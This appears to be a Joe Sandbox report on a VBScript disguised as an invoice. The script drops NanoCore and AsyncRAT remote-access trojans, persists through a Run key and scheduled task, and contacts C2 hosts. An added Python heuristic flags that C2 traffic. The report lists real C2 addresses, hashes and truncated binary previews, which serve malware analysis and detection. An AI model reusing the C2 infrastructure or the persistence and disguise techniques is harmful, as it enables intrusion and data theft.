  signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Uses schtasks.exe or at.exe to add and modify task schedules
  dropped: C:\Users\user\AppData\Local\Temp\fi.exe (PE32); C:\Users\user\AppData\Local\Temp\ame.exe (PE32)
  +-- ame.exe
  |     signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  |     dropped: C:\Users\user\AppData\Roaming\Notepads.exe (PE32); C:\Users\user\AppData\...\tmp4DD8.tmp.vbs (ASCII)
  |     +-- Notepads.exe (contacts sys2021.linkpc.net; same three detections on the dropped file)
  |     +-- wscript.exe (second instance)
  |           +-- schtasks.exe
  |                 +-- conhost.exe
  +-- fi.exe
        signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
        dropped: C:\Program Files (x86)\...\dhcpmon.exe (PE32); C:\Users\user\AppData\Roaming\...\run.dat (data)
        network: sys2021.linkpc.net 79.137.109.121 (ports 10090, 11940, 49716; OVHFR, France); 191.96.25.26 (ports 11940, 49725, 49726; AS40676US, Chile); 192.168.2.1 (unknown)

Started from the root node, i.e. from the persistence entries the sandbox replays (see Simulations below):
dhcpmon.exe: dropped C:\Users\user\AppData\...\dhcpmon.exe.log (ASCII)
Notepads.exe: dropped C:\Users\user\AppData\...\Notepads.exe.log (ASCII)
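The graph's network edges carry the signals behind the "Connects to many ports of the same IP" and "Non-Standard Port" findings: two non-standard ports on 79.137.109.121, the same port 11940 reused against 191.96.25.26, and a dynamic-DNS name (sys2021.linkpc.net) in front of the first server. The following is an added example, not part of the Joe Sandbox report, that turns those three observations into a connection-log heuristic. The log line format, the well-known-port list, the dynamic-DNS suffix list and the thresholds are assumptions; the IPs, ports and hostname are taken from the graph.

```python
"""Connection-log heuristic for the C2 pattern in the behaviour graph.

Added example, not part of the Joe Sandbox report. Log format, port and
suffix lists and thresholds are assumptions for illustration; the IPs,
ports and hostname are the report's.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Dict, List, Set


@dataclass(frozen=True)
class Conn:
    ts: str
    src: str
    dst: str
    dport: int
    host: str  # name the client resolved for dst, or "-" if none


# Constructed log (not a real capture); one flow per line: ts src dst dport host
SAMPLE_LOG = """\
19:09:50 192.168.2.22 79.137.109.121 10090 sys2021.linkpc.net
19:09:52 192.168.2.22 79.137.109.121 11940 sys2021.linkpc.net
19:09:55 192.168.2.22 191.96.25.26 11940 -
19:10:01 192.168.2.22 13.107.4.50 443 ctldl.windowsupdate.com
19:10:03 192.168.2.22 13.107.4.50 80 ctldl.windowsupdate.com
19:10:05 192.168.2.22 192.168.2.1 53 -
"""

# Assumption: ports whose use on its own is not worth an alert.
WELL_KNOWN_PORTS: Set[int] = {21, 22, 25, 53, 80, 123, 443, 445, 587, 993, 995, 3389}
# Assumption: a short seed list of free dynamic-DNS providers.
DYNDNS_SUFFIXES = (".linkpc.net", ".duckdns.org", ".ddns.net", ".no-ip.org")


def parse_log(text: str) -> List[Conn]:
    conns = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, host = line.split()
        conns.append(Conn(ts, src, dst, int(dport), host))
    return conns


def nonstandard_ports_by_dst(conns: List[Conn]) -> Dict[str, Set[int]]:
    """Public destination IP -> set of non-standard ports it was contacted on."""
    ports: Dict[str, Set[int]] = defaultdict(set)
    for c in conns:
        if ip_address(c.dst).is_private or c.dport in WELL_KNOWN_PORTS:
            continue
        ports[c.dst].add(c.dport)
    return dict(ports)


def flag_multi_port(conns: List[Conn], min_ports: int = 2) -> List[str]:
    """IPs reached on at least min_ports different non-standard ports."""
    return sorted(ip for ip, p in nonstandard_ports_by_dst(conns).items() if len(p) >= min_ports)


def flag_shared_port(conns: List[Conn]) -> Dict[int, List[str]]:
    """Non-standard ports used against more than one public IP: the same
    client configuration talking to several servers."""
    ips_by_port: Dict[int, Set[str]] = defaultdict(set)
    for ip, ports in nonstandard_ports_by_dst(conns).items():
        for p in ports:
            ips_by_port[p].add(ip)
    return {p: sorted(ips) for p, ips in ips_by_port.items() if len(ips) > 1}


def flag_dyndns(conns: List[Conn]) -> List[str]:
    """Resolved names under a dynamic-DNS provider suffix."""
    return sorted({c.host for c in conns if c.host.lower().endswith(DYNDNS_SUFFIXES)})


def analyse(text: str) -> Dict[str, object]:
    conns = parse_log(text)
    return {
        "multi_port_ips": flag_multi_port(conns),
        "shared_ports": flag_shared_port(conns),
        "dyndns_hosts": flag_dyndns(conns),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Private destinations and well-known ports are excluded before counting so that the update traffic to 13.107.4.50 and the DNS query to 192.168.2.1 in the constructed log do not contribute; the shared-port check is the one signal that survives when the operator rotates IPs but keeps the client build's port list.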


            Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Invoice No F1019855_PDF.vbs | 29% | Virustotal |
Invoice No F1019855_PDF.vbs | 23% | ReversingLabs | Script-WScript.Trojan.Heuristic

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Notepads.exe | 100% | Avira | TR/Dropper.Gen
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
C:\Users\user\AppData\Local\Temp\ame.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\fi.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
C:\Users\user\AppData\Roaming\Notepads.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ame.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\fi.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 81% | Virustotal |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 91% | Metadefender |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\AppData\Local\Temp\ame.exe | 62% | Virustotal |
C:\Users\user\AppData\Local\Temp\ame.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Local\Temp\fi.exe | 81% | Virustotal |
C:\Users\user\AppData\Local\Temp\fi.exe | 91% | Metadefender |
C:\Users\user\AppData\Local\Temp\fi.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
C:\Users\user\AppData\Roaming\Notepads.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.dhcpmon.exe.c40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
3.2.ame.exe.500000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
7.0.dhcpmon.exe.c40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
3.0.ame.exe.500000.0.unpack | 100% | Avira | TR/Dropper.Gen
26.0.Notepads.exe.ee0000.0.unpack | 100% | Avira | TR/Dropper.Gen
26.2.Notepads.exe.ee0000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
30.0.Notepads.exe.f40000.0.unpack | 100% | Avira | TR/Dropper.Gen
4.2.fi.exe.4f70000.10.unpack | 100% | Avira | TR/NanoCore.fadte
30.2.Notepads.exe.f40000.0.unpack | 100% | Avira | HEUR/AGEN.1106066
4.0.fi.exe.40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
4.2.fi.exe.40000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
(URL not shown in the report) | 0% | Avira URL Cloud | safe

            Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sys2021.linkpc.net | 79.137.109.121 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
(URL not shown in the report) | true | Avira URL Cloud: safe | low
sys2021.linkpc.net | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
191.96.25.26 | unknown | Chile | 40676 | AS40676US | false
79.137.109.121 | sys2021.linkpc.net | France | 16276 | OVHFR | false

Private

IP
192.168.2.1

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:404165
                  Start date:04.05.2021
                  Start time:19:08:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 12m 16s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Invoice No F1019855_PDF.vbs
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:33
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winVBS@14/9@20/3
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 38% (good quality ratio 27.1%)
                  • Quality average: 51.9%
                  • Quality standard deviation: 40.6%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .vbs
                  Warnings:
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 92.122.145.220, 52.147.198.201, 40.88.32.150, 93.184.221.240, 168.61.161.212, 20.82.210.154, 92.122.213.247, 92.122.213.194, 13.107.4.50, 52.155.217.156, 40.64.100.89, 20.54.26.129, 184.30.24.56, 20.50.102.62
                  • Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, Edge-Prod-FRA.env.au.au-msedge.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, cs11.wpc.v0cdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, e1723.g.akamaiedge.net, download.windowsupdate.com, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

Time | Type | Description
19:09:46 | API Interceptor | 956x Sleep call for process: fi.exe modified
19:09:47 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
19:11:22 | Task Scheduler | Run new task: Notepads.exe path: C:\Users\user\AppData\Roaming\Notepads.exe

                  Joe Sandbox View / Context

                  IPs

                  Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                  191.96.25.26 | Spec_PDF.vbs | Get hash | malicious | Browse |
                  191.96.25.26 | SpecPDF.vbs | Get hash | malicious | Browse |
                  79.137.109.121 | Transcation03232016646pdf.exe | Get hash | malicious | Browse |
                  79.137.109.121 | NEW SC #ORDER.exe | Get hash | malicious | Browse |
                  79.137.109.121 | NEW SC #ORDER.exe | Get hash | malicious | Browse |
                  79.137.109.121 | NEW SC.exe | Get hash | malicious | Browse |
                  79.137.109.121 | NEW SC.exe | Get hash | malicious | Browse |

                                Domains

                                Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                sys2021.linkpc.net | Spec_PDF.vbs | Get hash | malicious | Browse | 105.112.11.245
                                sys2021.linkpc.net | SpecPDF.vbs | Get hash | malicious | Browse | 179.43.166.32

                                ASN

                                Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                AS40676US | 2f50000.exe | Get hash | malicious | Browse | 38.39.192.78
                                AS40676US | PT6-1152.doc | Get hash | malicious | Browse | 45.61.136.72
                                AS40676US | PT6-1152.doc | Get hash | malicious | Browse | 45.61.136.72
                                AS40676US | wMqdemYyHm.exe | Get hash | malicious | Browse | 104.217.141.249
                                AS40676US | 70pGP1JaCf6M0kf.exe | Get hash | malicious | Browse | 107.160.232.135
                                AS40676US | Spec_PDF.vbs | Get hash | malicious | Browse | 191.96.25.26
                                AS40676US | 8CgG2kY3Ow.dll | Get hash | malicious | Browse | 45.61.138.153
                                AS40676US | DHL_S390201.exe | Get hash | malicious | Browse | 45.34.249.30
                                AS40676US | 978463537_BL FOR APPROVAL.doc | Get hash | malicious | Browse | 45.34.114.71
                                AS40676US | SpecPDF.vbs | Get hash | malicious | Browse | 191.96.25.26
                                AS40676US | 7mB68AZqJs.exe | Get hash | malicious | Browse | 104.217.143.44
                                AS40676US | q3uHPdoxWP.exe | Get hash | malicious | Browse | 172.107.55.6
                                AS40676US | NMpDBwHJP8.exe | Get hash | malicious | Browse | 172.107.55.6
                                AS40676US | OrSxEMsYDA.exe | Get hash | malicious | Browse | 107.160.118.15
                                AS40676US | swift note.xlsx | Get hash | malicious | Browse | 107.160.118.15
                                AS40676US | sgJRcWvnkP.exe | Get hash | malicious | Browse | 107.160.118.15
                                AS40676US | YPJ9DZYIpO | Get hash | malicious | Browse | 107.169.29.204
                                AS40676US | IN18663Q0031139I.xlsx | Get hash | malicious | Browse | 45.34.238.253
                                AS40676US | YZ1q5HY7kK.exe | Get hash | malicious | Browse | 104.217.62.116
                                AS40676US | ORDER6798ERA-LBT.exe | Get hash | malicious | Browse | 172.107.43.183
                                OVHFR | Outstanding-Debt-1840996632-05042021.xlsm | Get hash | malicious | Browse | 51.89.73.159
                                OVHFR | SecuriteInfo.com.W32.MSIL_Troj.ASI.genEldorado.27642.exe | Get hash | malicious | Browse | 66.70.204.222
                                OVHFR | Outstanding-Debt-610716193-05042021.xlsm | Get hash | malicious | Browse | 51.89.73.159
                                OVHFR | Outstanding-Debt-1840996632-05042021.xlsm | Get hash | malicious | Browse | 51.89.73.159
                                OVHFR | New Order Request_0232147.exe | Get hash | malicious | Browse | 149.202.85.210
                                OVHFR | Transcation03232016646pdf.exe | Get hash | malicious | Browse | 79.137.109.121
                                OVHFR | 5e60c283_by_Libranalysis.xlsm | Get hash | malicious | Browse | 51.77.73.218
                                OVHFR | MZyeln5mSFOjxMx.exe | Get hash | malicious | Browse | 66.70.204.222
                                OVHFR | 5e60c283_by_Libranalysis.xlsm | Get hash | malicious | Browse | 51.77.73.218
                                OVHFR | 51086cc4_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 8aa43191_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 5e60c283_by_Libranalysis.xlsm | Get hash | malicious | Browse | 51.77.73.218
                                OVHFR | 51086cc4_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 8aa43191_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 840e7dfd_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 840e7dfd_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 94765446_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | d192feb6_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 7bc33f1c_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13
                                OVHFR | 94765446_by_Libranalysis.dll | Get hash | malicious | Browse | 167.114.113.13

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                C:\Users\user\AppData\Roaming\Notepads.exe | Spec_PDF.vbs | Get hash | malicious | Browse |
                                C:\Users\user\AppData\Roaming\Notepads.exe | SpecPDF.vbs | Get hash | malicious | Browse |
                                C:\Users\user\AppData\Local\Temp\fi.exe | Spec_PDF.vbs | Get hash | malicious | Browse |
                                C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Spec_PDF.vbs | Get hash | malicious | Browse |
                                C:\Users\user\AppData\Local\Temp\ame.exe | Spec_PDF.vbs | Get hash | malicious | Browse |
                                C:\Users\user\AppData\Local\Temp\ame.exe | SpecPDF.vbs | Get hash | malicious | Browse |

                                            Created / dropped Files

                                            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                            Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):525
                                            Entropy (8bit):5.2874233355119316
                                            Encrypted:false
                                            SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                            MD5:61CCF53571C9ABA6511D696CB0D32E45
                                            SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                            SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                            SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Notepads.exe.log
                                            Process:C:\Users\user\AppData\Roaming\Notepads.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):425
                                            Entropy (8bit):5.351599573976469
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhav:ML9E4KrgKDE4KGKN08AKhk
                                            MD5:BEBB66F4CB83D5C34857FE75DE3A8610
                                            SHA1:66FB475AADAE0D4542125C8E272D9D6BBFA555BB
                                            SHA-256:C1A8084313E66497C9F53D0F65E85AC2D4A840AF7FEBCCCFB3924F54BCF1BADC
                                            SHA-512:45181B8B60B7F0FD0D841F50592B9E83F7BADF1FFED040DFCAF5779BF5F653633D78B28E5AFA92A53E9DA965113E4A8E7A16456AE3A8FDF786B7DF6B3FEE5CE8
                                            Malicious:true
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ame.exe.log
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.374391981354885
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                                            MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                                            SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                                            SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                                            SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                                            Malicious:false
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                                            C:\Users\user\AppData\Local\Temp\ame.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 62%, Browse
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........."...0.................. ........@.. .......................@............@.....................................K.......v.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...v...........................@..@.reloc....... ......................@..B........................H............'............................................................/.\......V..;...$0.xC.=VD..b......9A..{....*..{....*..{ ...*r.(!.....}......}......} ...*..(!...*..{....*"..}....*..{....*...}......sH...}......sL...}....*f.(!.....(.....s!...(....*..{....*"..}....*j.(!.....sH...}......((...*..{....*"..}....*..*..*..{....*"..}....*v..(......2.s>...(?.....}'...*V..P.{)....{*...or...*..,......ioI......{,....{-...or...*.~....*.......*.~/...*.../...*.~0...*...0...*.~1...*
                                            C:\Users\user\AppData\Local\Temp\fi.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
